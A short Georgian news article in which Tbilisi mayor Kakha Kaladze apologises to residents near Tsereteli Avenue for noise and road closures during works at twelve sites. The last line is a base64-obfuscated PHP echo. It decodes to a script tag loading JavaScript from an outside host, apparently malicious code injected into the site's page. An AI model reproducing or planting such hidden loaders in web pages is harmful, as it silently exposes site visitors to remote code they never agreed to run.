celsiusi
ავერსი საქკაბელი

წერეთლის გამზირის მიმდებარე ტერიტორიაზე მცხოვრებ ადამიანებს დისკომფორტის გამო, მინდა, ბოდიში მოვუხადო, – ამის შესახებ თბილისის მერმა, კახა კალაძემ ჟურნალისტებს განუცხადა,

მისი თქმით, შეზღუდვის გარეშე შეუძლებელია ასეთი მასშტაბური სამუშაოების ჩატარება.

კალაძის განცხადებით, ყველაფერი გაკეთდება, რომ რაც შეიძლება მალე დასრულდეს სარეაბილიტაციო სამუშაოები.

„მესმის, რომ გარკვეული დისკომფორტია აღნიშნული პროექტების განხორციელების გამო, მაგრამ შეზღუდვის გარეშე, შეუძლებელია ასეთი მასშტაბური სამუშაოების ჩატარება. შესაბამისად, წერეთლის გამზირის მიმდებარე ტერიტორიაზე მცხოვრებ ადამიანებს ამ დისკომფორტის გამო, მინდა, ბოდიში მოვუხადო. ვიცით, რომ ღამის საათებში ხმაურია, მუშაობა უწევთ. 12 ლოკაციაა, სადაც ერთდროულად მიმდინარეობს სამუშაოები, თუმცა ამ შეზღუდვებისა და გადაკეტვის გარეშე, აღნიშნული პროექტის განხორციელება შეუძლებელია. ყველაფერს გავაკეთებთ, რომ დროულად დასრულდეს. საგზაო ინფრასტრუქტურული სამუშაოები გაცილებით ადრე დასრულდება“, – განაცხადა კახა კალაძემ.

488
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");